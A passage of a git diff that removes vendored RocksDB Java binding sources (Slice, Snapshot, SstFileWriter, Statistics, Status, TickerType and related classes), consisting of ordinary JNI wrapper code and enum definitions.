-   * the byte array from a specific offset.</p>
-   *
-   * @param data byte array.
-   * @param offset offset within the byte array.
-   */
-  public Slice(final byte[] data, final int offset) {
-    super(createNewSlice0(data, offset));
-  }
-
-  /**
-   * <p>Constructs a slice where the data is a copy of
-   * the byte array.</p>
-   *
-   * @param data byte array.
-   */
-  public Slice(final byte[] data) {
-    super(createNewSlice1(data));
-  }
-
-  @Override
-  public void clear() {
-    clear0(getNativeHandle(), !cleared, internalBufferOffset);
-    cleared = true;
-  }
-
-  @Override
-  public void removePrefix(final int n) {
-    removePrefix0(getNativeHandle(), n);
-    this.internalBufferOffset += n;
-  }
-
-  /**
-   * <p>Deletes underlying C++ slice pointer
-   * and any buffered data.</p>
-   *
-   * <p>
-   * Note that this function should be called only after all
-   * RocksDB instances referencing the slice are closed.
-   * Otherwise an undefined behavior will occur.</p>
-   */
-  @Override
-  protected void disposeInternal() {
-    final long nativeHandle = getNativeHandle();
-    if(!cleared) {
-      disposeInternalBuf(nativeHandle, internalBufferOffset);
-    }
-    super.disposeInternal(nativeHandle);
-  }
-
-  @Override protected final native byte[] data0(long handle);
-  private native static long createNewSlice0(final byte[] data,
-      final int length);
-  private native static long createNewSlice1(final byte[] data);
-  private native void clear0(long handle, boolean internalBuffer,
-      long internalBufferOffset);
-  private native void removePrefix0(long handle, int length);
-  private native void disposeInternalBuf(final long handle,
-      long internalBufferOffset);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Snapshot.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Snapshot.java
deleted file mode 100644
index a6b53f4..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Snapshot.java
+++ /dev/null
@@ -1,37 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Snapshot of database
- */
-public class Snapshot extends RocksObject {
-  Snapshot(final long nativeHandle) {
-    super(nativeHandle);
-  }
-
-  /**
-   * Return the associated sequence number;
-   *
-   * @return the associated sequence number of
-   *     this snapshot.
-   */
-  public long getSequenceNumber() {
-    assert(isOwningHandle());
-    return getSequenceNumber(nativeHandle_);
-  }
-
-  /**
-   * Dont release C++ Snapshot pointer. The pointer
-   * to the snapshot is released by the database
-   * instance.
-   */
-  @Override
-  protected final void disposeInternal(final long handle) {
-  }
-
-  private native long getSequenceNumber(long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SstFileWriter.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SstFileWriter.java
deleted file mode 100644
index 5f35f0f..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/SstFileWriter.java
+++ /dev/null
@@ -1,256 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * SstFileWriter is used to create sst files that can be added to the
- * database later. All keys in files generated by SstFileWriter will have
- * sequence number = 0.
- */
-public class SstFileWriter extends RocksObject {
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  /**
-   * SstFileWriter Constructor.
-   *
-   * @param envOptions {@link org.rocksdb.EnvOptions} instance.
-   * @param options {@link org.rocksdb.Options} instance.
-   * @param comparator the comparator to specify the ordering of keys.
-   *
-   * @deprecated Use {@link #SstFileWriter(EnvOptions, Options)}.
-   * Passing an explicit comparator is deprecated in lieu of passing the
-   * comparator as part of options. Use the other constructor instead.
-   */
-  @Deprecated
-  public SstFileWriter(final EnvOptions envOptions, final Options options,
-      final AbstractComparator<? extends AbstractSlice<?>> comparator) {
-    super(newSstFileWriter(
-        envOptions.nativeHandle_, options.nativeHandle_, comparator.getNativeHandle()));
-  }
-
-  /**
-   * SstFileWriter Constructor.
-   *
-   * @param envOptions {@link org.rocksdb.EnvOptions} instance.
-   * @param options {@link org.rocksdb.Options} instance.
-   */
-  public SstFileWriter(final EnvOptions envOptions, final Options options) {
-    super(newSstFileWriter(
-        envOptions.nativeHandle_, options.nativeHandle_));
-  }
-
-  /**
-   * Prepare SstFileWriter to write to a file.
-   *
-   * @param filePath the location of file
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void open(final String filePath) throws RocksDBException {
-    open(nativeHandle_, filePath);
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #put(Slice, Slice)}
-   */
-  @Deprecated
-  public void add(final Slice key, final Slice value)
-      throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   *
-   * @deprecated Use {@link #put(DirectSlice, DirectSlice)}
-   */
-  @Deprecated
-  public void add(final DirectSlice key, final DirectSlice value)
-      throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final Slice key, final Slice value) throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void put(final DirectSlice key, final DirectSlice value)
-      throws RocksDBException {
-    put(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
- /**
-   * Add a Put key with value to currently opened file.
-   *
-   * @param key the specified key to be inserted.
-   * @param value the value associated with the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-public void put(final byte[] key, final byte[] value)
-    throws RocksDBException {
-  put(nativeHandle_, key, value);
-}
-
-  /**
-   * Add a Merge key with value to currently opened file.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final Slice key, final Slice value)
-      throws RocksDBException {
-    merge(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a Merge key with value to currently opened file.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final byte[] key, final byte[] value)
-      throws RocksDBException {
-    merge(nativeHandle_, key, value);
-  }
-
-  /**
-   * Add a Merge key with value to currently opened file.
-   *
-   * @param key the specified key to be merged.
-   * @param value the value to be merged with the current value for
-   * the specified key.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void merge(final DirectSlice key, final DirectSlice value)
-      throws RocksDBException {
-    merge(nativeHandle_, key.getNativeHandle(), value.getNativeHandle());
-  }
-
-  /**
-   * Add a deletion key to currently opened file.
-   *
-   * @param key the specified key to be deleted.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final Slice key) throws RocksDBException {
-    delete(nativeHandle_, key.getNativeHandle());
-  }
-
-  /**
-   * Add a deletion key to currently opened file.
-   *
-   * @param key the specified key to be deleted.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final DirectSlice key) throws RocksDBException {
-    delete(nativeHandle_, key.getNativeHandle());
-  }
-
-  /**
-   * Add a deletion key to currently opened file.
-   *
-   * @param key the specified key to be deleted.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void delete(final byte[] key) throws RocksDBException {
-    delete(nativeHandle_, key);
-  }
-
-  /**
-   * Finish the process and close the sst file.
-   *
-   * @throws RocksDBException thrown if error happens in underlying
-   *    native library.
-   */
-  public void finish() throws RocksDBException {
-    finish(nativeHandle_);
-  }
-
-  private native static long newSstFileWriter(
-      final long envOptionsHandle, final long optionsHandle,
-      final long userComparatorHandle);
-
-  private native static long newSstFileWriter(final long envOptionsHandle,
-      final long optionsHandle);
-
-  private native void open(final long handle, final String filePath)
-      throws RocksDBException;
-
-  private native void put(final long handle, final long keyHandle,
-      final long valueHandle) throws RocksDBException;
-      
-  private native void put(final long handle, final byte[] key,
-      final byte[] value) throws RocksDBException;
-
-  private native void merge(final long handle, final long keyHandle,
-      final long valueHandle) throws RocksDBException;
-
-  private native void merge(final long handle, final byte[] key,
-      final byte[] value) throws RocksDBException;
-
-  private native void delete(final long handle, final long keyHandle)
-      throws RocksDBException;
-
-  private native void delete(final long handle, final byte[] key)
-      throws RocksDBException;
-
-  private native void finish(final long handle) throws RocksDBException;
-
-  @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Statistics.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Statistics.java
deleted file mode 100644
index 10c072c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Statistics.java
+++ /dev/null
@@ -1,149 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.EnumSet;
-
-/**
- * Statistics to analyze the performance of a db. Pointer for statistics object
- * is managed by Options class.
- */
-public class Statistics extends RocksObject {
-
-  public Statistics() {
-    super(newStatistics());
-  }
-
-  public Statistics(final Statistics otherStatistics) {
-    super(newStatistics(otherStatistics.nativeHandle_));
-  }
-
-  public Statistics(final EnumSet<HistogramType> ignoreHistograms) {
-    super(newStatistics(toArrayValues(ignoreHistograms)));
-  }
-
-  public Statistics(final EnumSet<HistogramType> ignoreHistograms, final Statistics otherStatistics) {
-    super(newStatistics(toArrayValues(ignoreHistograms), otherStatistics.nativeHandle_));
-  }
-
-  /**
-   * Intentionally package-private.
-   *
-   * Used from {@link DBOptions#statistics()}
-   *
-   * @param existingStatisticsHandle The C++ pointer to an existing statistics object
-   */
-  Statistics(final long existingStatisticsHandle) {
-    super(existingStatisticsHandle);
-  }
-
-  private static byte[] toArrayValues(final EnumSet<HistogramType> histogramTypes) {
-    final byte[] values = new byte[histogramTypes.size()];
-    int i = 0;
-    for(final HistogramType histogramType : histogramTypes) {
-      values[i++] = histogramType.getValue();
-    }
-    return values;
-  }
-
-  /**
-   * Gets the current stats level.
-   *
-   * @return The stats level.
-   */
-  public StatsLevel statsLevel() {
-    return StatsLevel.getStatsLevel(statsLevel(nativeHandle_));
-  }
-
-  /**
-   * Sets the stats level.
-   *
-   * @param statsLevel The stats level to set.
-   */
-  public void setStatsLevel(final StatsLevel statsLevel) {
-    setStatsLevel(nativeHandle_, statsLevel.getValue());
-  }
-
-  /**
-   * Get the count for a ticker.
-   *
-   * @param tickerType The ticker to get the count for
-   *
-   * @return The count for the ticker
-   */
-  public long getTickerCount(final TickerType tickerType) {
-    assert(isOwningHandle());
-    return getTickerCount(nativeHandle_, tickerType.getValue());
-  }
-
-  /**
-   * Get the count for a ticker and reset the tickers count.
-   *
-   * @param tickerType The ticker to get the count for
-   *
-   * @return The count for the ticker
-   */
-  public long getAndResetTickerCount(final TickerType tickerType) {
-    assert(isOwningHandle());
-    return getAndResetTickerCount(nativeHandle_, tickerType.getValue());
-  }
-
-  /**
-   * Gets the histogram data for a particular histogram.
-   *
-   * @param histogramType The histogram to retrieve the data for
-   *
-   * @return The histogram data
-   */
-  public HistogramData getHistogramData(final HistogramType histogramType) {
-    assert(isOwningHandle());
-    return getHistogramData(nativeHandle_, histogramType.getValue());
-  }
-
-  /**
-   * Gets a string representation of a particular histogram.
-   *
-   * @param histogramType The histogram to retrieve the data for
-   *
-   * @return A string representation of the histogram data
-   */
-  public String getHistogramString(final HistogramType histogramType) {
-    assert(isOwningHandle());
-    return getHistogramString(nativeHandle_, histogramType.getValue());
-  }
-
-  /**
-   * Resets all ticker and histogram stats.
-   */
-  public void reset() throws RocksDBException {
-    assert(isOwningHandle());
-    reset(nativeHandle_);
-  }
-
-  /**
-   * String representation of the statistic object.
-   */
-  public String toString() {
-    assert(isOwningHandle());
-    return toString(nativeHandle_);
-  }
-
-  private native static long newStatistics();
-  private native static long newStatistics(final long otherStatisticsHandle);
-  private native static long newStatistics(final byte[] ignoreHistograms);
-  private native static long newStatistics(final byte[] ignoreHistograms, final long otherStatisticsHandle);
-
-  @Override protected final native void disposeInternal(final long handle);
-
-  private native byte statsLevel(final long handle);
-  private native void setStatsLevel(final long handle, final byte statsLevel);
-  private native long getTickerCount(final long handle, final byte tickerType);
-  private native long getAndResetTickerCount(final long handle, final byte tickerType);
-  private native HistogramData getHistogramData(final long handle, final byte histogramType);
-  private native String getHistogramString(final long handle, final byte histogramType);
-  private native void reset(final long nativeHandle) throws RocksDBException;
-  private native String toString(final long nativeHandle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollector.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollector.java
deleted file mode 100644
index 48cf8af..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollector.java
+++ /dev/null
@@ -1,111 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.List;
-import java.util.concurrent.Executors;
-import java.util.concurrent.ExecutorService;
-import java.util.concurrent.TimeUnit;
-
-/**
- * <p>Helper class to collect DB statistics periodically at a period specified in
- * constructor. Callback function (provided in constructor) is called with
- * every statistics collection.</p>
- *
- * <p>Caller should call start() to start statistics collection. Shutdown() should
- * be called to stop stats collection and should be called before statistics (
- * provided in constructor) reference has been disposed.</p>
- */
-public class StatisticsCollector {
-  private final List<StatsCollectorInput> _statsCollectorInputList;
-  private final ExecutorService _executorService;
-  private final int _statsCollectionInterval;
-  private volatile boolean _isRunning = true;
-
-  /**
-   * Constructor for statistics collector.
-   *
-   * @param statsCollectorInputList List of statistics collector input.
-   * @param statsCollectionIntervalInMilliSeconds Statistics collection time
-   *        period (specified in milliseconds).
-   */
-  public StatisticsCollector(
-      final List<StatsCollectorInput> statsCollectorInputList,
-      final int statsCollectionIntervalInMilliSeconds) {
-    _statsCollectorInputList = statsCollectorInputList;
-    _statsCollectionInterval = statsCollectionIntervalInMilliSeconds;
-
-    _executorService = Executors.newSingleThreadExecutor();
-  }
-
-  public void start() {
-    _executorService.submit(collectStatistics());
-  }
-
-  /**
-   * Shuts down statistics collector.
-   *
-   * @param shutdownTimeout Time in milli-seconds to wait for shutdown before
-   *        killing the collection process.
-   * @throws java.lang.InterruptedException thrown if Threads are interrupted.
-   */
-  public void shutDown(final int shutdownTimeout) throws InterruptedException {
-    _isRunning = false;
-
-    _executorService.shutdownNow();
-    // Wait for collectStatistics runnable to finish so that disposal of
-    // statistics does not cause any exceptions to be thrown.
-    _executorService.awaitTermination(shutdownTimeout, TimeUnit.MILLISECONDS);
-  }
-
-  private Runnable collectStatistics() {
-    return new Runnable() {
-
-      @Override
-      public void run() {
-        while (_isRunning) {
-          try {
-            if(Thread.currentThread().isInterrupted()) {
-              break;
-            }
-            for(final StatsCollectorInput statsCollectorInput :
-                _statsCollectorInputList) {
-              Statistics statistics = statsCollectorInput.getStatistics();
-              StatisticsCollectorCallback statsCallback =
-                  statsCollectorInput.getCallback();
-
-              // Collect ticker data
-              for(final TickerType ticker : TickerType.values()) {
-                if(ticker != TickerType.TICKER_ENUM_MAX) {
-                  final long tickerValue = statistics.getTickerCount(ticker);
-                  statsCallback.tickerCallback(ticker, tickerValue);
-                }
-              }
-
-              // Collect histogram data
-              for(final HistogramType histogramType : HistogramType.values()) {
-                if(histogramType != HistogramType.HISTOGRAM_ENUM_MAX) {
-                  final HistogramData histogramData =
-                          statistics.getHistogramData(histogramType);
-                  statsCallback.histogramCallback(histogramType, histogramData);
-                }
-              }
-
-              Thread.sleep(_statsCollectionInterval);
-            }
-          }
-          catch (final InterruptedException e) {
-            Thread.currentThread().interrupt();
-            break;
-          }
-          catch (final Exception e) {
-            throw new RuntimeException("Error while calculating statistics", e);
-          }
-        }
-      }
-    };
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
deleted file mode 100644
index f3785b1..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatisticsCollectorCallback.java
+++ /dev/null
@@ -1,32 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Callback interface provided to StatisticsCollector.
- *
- * Thread safety:
- * StatisticsCollector doesn't make any guarantees about thread safety.
- * If the same reference of StatisticsCollectorCallback is passed to multiple
- * StatisticsCollector references, then its the responsibility of the
- * user to make StatisticsCollectorCallback's implementation thread-safe.
- *
- */
-public interface StatisticsCollectorCallback {
-  /**
-   * Callback function to get ticker values.
-   * @param tickerType Ticker type.
-   * @param tickerCount Value of ticker type.
-  */
-  void tickerCallback(TickerType tickerType, long tickerCount);
-
-  /**
-   * Callback function to get histogram values.
-   * @param histType Histogram type.
-   * @param histData Histogram data.
-  */
-  void histogramCallback(HistogramType histType, HistogramData histData);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsCollectorInput.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsCollectorInput.java
deleted file mode 100644
index 5bf43ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsCollectorInput.java
+++ /dev/null
@@ -1,35 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Contains all information necessary to collect statistics from one instance
- * of DB statistics.
- */
-public class StatsCollectorInput {
-  private final Statistics _statistics;
-  private final StatisticsCollectorCallback _statsCallback;
-
-  /**
-   * Constructor for StatsCollectorInput.
-   *
-   * @param statistics Reference of DB statistics.
-   * @param statsCallback Reference of statistics callback interface.
-   */
-  public StatsCollectorInput(final Statistics statistics,
-      final StatisticsCollectorCallback statsCallback) {
-    _statistics = statistics;
-    _statsCallback = statsCallback;
-  }
-
-  public Statistics getStatistics() {
-    return _statistics;
-  }
-
-  public StatisticsCollectorCallback getCallback() {
-    return _statsCallback;
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsLevel.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsLevel.java
deleted file mode 100644
index cc2a87c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StatsLevel.java
+++ /dev/null
@@ -1,65 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * The level of Statistics to report.
- */
-public enum StatsLevel {
-    /**
-     * Collect all stats except time inside mutex lock AND time spent on
-     * compression.
-     */
-    EXCEPT_DETAILED_TIMERS((byte) 0x0),
-
-    /**
-     * Collect all stats except the counters requiring to get time inside the
-     * mutex lock.
-     */
-    EXCEPT_TIME_FOR_MUTEX((byte) 0x1),
-
-    /**
-     * Collect all stats, including measuring duration of mutex operations.
-     *
-     * If getting time is expensive on the platform to run, it can
-     * reduce scalability to more threads, especially for writes.
-     */
-    ALL((byte) 0x2);
-
-    private final byte value;
-
-    StatsLevel(final byte value) {
-        this.value = value;
-    }
-
-    /**
-     * <p>Returns the byte value of the enumerations value.</p>
-     *
-     * @return byte representation
-     */
-    public byte getValue() {
-        return value;
-    }
-
-    /**
-     * Get StatsLevel by byte value.
-     *
-     * @param value byte representation of StatsLevel.
-     *
-     * @return {@link org.rocksdb.StatsLevel} instance.
-     * @throws java.lang.IllegalArgumentException if an invalid
-     *     value is provided.
-     */
-    public static StatsLevel getStatsLevel(final byte value) {
-        for (final StatsLevel statsLevel : StatsLevel.values()) {
-            if (statsLevel.getValue() == value){
-                return statsLevel;
-            }
-        }
-        throw new IllegalArgumentException(
-                "Illegal value provided for InfoLogLevel.");
-    }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Status.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Status.java
deleted file mode 100644
index d34b72c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/Status.java
+++ /dev/null
@@ -1,113 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * Represents the status returned by a function call in RocksDB.
- *
- * Currently only used with {@link RocksDBException} when the
- * status is not {@link Code#Ok}
- */
-public class Status {
-  private final Code code;
-  /* @Nullable */ private final SubCode subCode;
-  /* @Nullable */ private final String state;
-
-  public Status(final Code code, final SubCode subCode, final String state) {
-    this.code = code;
-    this.subCode = subCode;
-    this.state = state;
-  }
-
-  /**
-   * Intentionally private as this will be called from JNI
-   */
-  private Status(final byte code, final byte subCode, final String state) {
-    this.code = Code.getCode(code);
-    this.subCode = SubCode.getSubCode(subCode);
-    this.state = state;
-  }
-
-  public Code getCode() {
-    return code;
-  }
-
-  public SubCode getSubCode() {
-    return subCode;
-  }
-
-  public String getState() {
-    return state;
-  }
-
-  public String getCodeString() {
-    final StringBuilder builder = new StringBuilder()
-        .append(code.name());
-    if(subCode != null && subCode != SubCode.None) {
-      builder.append("(")
-          .append(subCode.name())
-          .append(")");
-    }
-    return builder.toString();
-  }
-
-  public enum Code {
-    Ok(                 (byte)0x0),
-    NotFound(           (byte)0x1),
-    Corruption(         (byte)0x2),
-    NotSupported(       (byte)0x3),
-    InvalidArgument(    (byte)0x4),
-    IOError(            (byte)0x5),
-    MergeInProgress(    (byte)0x6),
-    Incomplete(         (byte)0x7),
-    ShutdownInProgress( (byte)0x8),
-    TimedOut(           (byte)0x9),
-    Aborted(            (byte)0xA),
-    Busy(               (byte)0xB),
-    Expired(            (byte)0xC),
-    TryAgain(           (byte)0xD);
-
-    private final byte value;
-
-    Code(final byte value) {
-      this.value = value;
-    }
-
-    public static Code getCode(final byte value) {
-      for (final Code code : Code.values()) {
-        if (code.value == value){
-          return code;
-        }
-      }
-      throw new IllegalArgumentException(
-          "Illegal value provided for Code.");
-    }
-  }
-
-  public enum SubCode {
-    None(         (byte)0x0),
-    MutexTimeout( (byte)0x1),
-    LockTimeout(  (byte)0x2),
-    LockLimit(    (byte)0x3),
-    MaxSubCode(   (byte)0x7E);
-
-    private final byte value;
-
-    SubCode(final byte value) {
-      this.value = value;
-    }
-
-    public static SubCode getSubCode(final byte value) {
-      for (final SubCode subCode : SubCode.values()) {
-        if (subCode.value == value){
-          return subCode;
-        }
-      }
-      throw new IllegalArgumentException(
-          "Illegal value provided for SubCode.");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StringAppendOperator.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StringAppendOperator.java
deleted file mode 100644
index 85c36ad..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/StringAppendOperator.java
+++ /dev/null
@@ -1,19 +0,0 @@
-// Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com).  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-/**
- * StringAppendOperator is a merge operator that concatenates
- * two strings.
- */
-public class StringAppendOperator extends MergeOperator {
-    public StringAppendOperator() {
-        super(newSharedStringAppendOperator());
-    }
-
-    private native static long newSharedStringAppendOperator();
-    @Override protected final native void disposeInternal(final long handle);
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TableFormatConfig.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TableFormatConfig.java
deleted file mode 100644
index dbe524c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TableFormatConfig.java
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-package org.rocksdb;
-
-/**
- * TableFormatConfig is used to config the internal Table format of a RocksDB.
- * To make a RocksDB to use a specific Table format, its associated
- * TableFormatConfig should be properly set and passed into Options via
- * Options.setTableFormatConfig() and open the db using that Options.
- */
-public abstract class TableFormatConfig {
-  /**
-   * <p>This function should only be called by Options.setTableFormatConfig(),
-   * which will create a c++ shared-pointer to the c++ TableFactory
-   * that associated with the Java TableFormatConfig.</p>
-   *
-   * @return native handle address to native table instance.
-   */
-  abstract protected long newTableFactoryHandle();
-}
diff --git a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TickerType.java b/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TickerType.java
deleted file mode 100644
index 948079c..0000000
--- a/thirdparty/rocksdb/java/src/main/java/org/rocksdb/TickerType.java
+++ /dev/null
@@ -1,480 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-public enum TickerType {
-
-    /**
-     * total block cache misses
-     *
-     * REQUIRES: BLOCK_CACHE_MISS == BLOCK_CACHE_INDEX_MISS +
-     *     BLOCK_CACHE_FILTER_MISS +
-     *     BLOCK_CACHE_DATA_MISS;
-     */
-    BLOCK_CACHE_MISS((byte) 0x0),
-
-    /**
-     * total block cache hit
-     *
-     * REQUIRES: BLOCK_CACHE_HIT == BLOCK_CACHE_INDEX_HIT +
-     *     BLOCK_CACHE_FILTER_HIT +
-     *     BLOCK_CACHE_DATA_HIT;
-     */
-    BLOCK_CACHE_HIT((byte) 0x1),
-
-    BLOCK_CACHE_ADD((byte) 0x2),
-
-    /**
-     * # of failures when adding blocks to block cache.
-     */
-    BLOCK_CACHE_ADD_FAILURES((byte) 0x3),
-
-    /**
-     * # of times cache miss when accessing index block from block cache.
-     */
-    BLOCK_CACHE_INDEX_MISS((byte) 0x4),
-
-    /**
-     * # of times cache hit when accessing index block from block cache.
-     */
-    BLOCK_CACHE_INDEX_HIT((byte) 0x5),
-
-    /**
-     * # of index blocks added to block cache.
-     */
-    BLOCK_CACHE_INDEX_ADD((byte) 0x6),
-
-    /**
-     * # of bytes of index blocks inserted into cache
-     */
-    BLOCK_CACHE_INDEX_BYTES_INSERT((byte) 0x7),
-
-    /**
-     * # of bytes of index block erased from cache
-     */
-    BLOCK_CACHE_INDEX_BYTES_EVICT((byte) 0x8),
-
-    /**
-     * # of times cache miss when accessing filter block from block cache.
-     */
-    BLOCK_CACHE_FILTER_MISS((byte) 0x9),
-
-    /**
-     * # of times cache hit when accessing filter block from block cache.
-     */
-    BLOCK_CACHE_FILTER_HIT((byte) 0xA),
-
-    /**
-     * # of filter blocks added to block cache.
-     */
-    BLOCK_CACHE_FILTER_ADD((byte) 0xB),
-
-    /**
-     * # of bytes of bloom filter blocks inserted into cache
-     */
-    BLOCK_CACHE_FILTER_BYTES_INSERT((byte) 0xC),
-
-    /**
-     * # of bytes of bloom filter block erased from cache
-     */
-    BLOCK_CACHE_FILTER_BYTES_EVICT((byte) 0xD),
-
-    /**
-     * # of times cache miss when accessing data block from block cache.
-     */
-    BLOCK_CACHE_DATA_MISS((byte) 0xE),
-
-    /**
-     * # of times cache hit when accessing data block from block cache.
-     */
-    BLOCK_CACHE_DATA_HIT((byte) 0xF),
-
-    /**
-     * # of data blocks added to block cache.
-     */
-    BLOCK_CACHE_DATA_ADD((byte) 0x10),
-
-    /**
-     * # of bytes of data blocks inserted into cache
-     */
-    BLOCK_CACHE_DATA_BYTES_INSERT((byte) 0x11),
-
-    /**
-     * # of bytes read from cache.
-     */
-    BLOCK_CACHE_BYTES_READ((byte) 0x12),
-
-    /**
-     * # of bytes written into cache.
-     */
-    BLOCK_CACHE_BYTES_WRITE((byte) 0x13),
-
-    /**
-     * # of times bloom filter has avoided file reads.
-     */
-    BLOOM_FILTER_USEFUL((byte) 0x14),
-
-    /**
-     * # persistent cache hit
-     */
-    PERSISTENT_CACHE_HIT((byte) 0x15),
-
-    /**
-     * # persistent cache miss
-     */
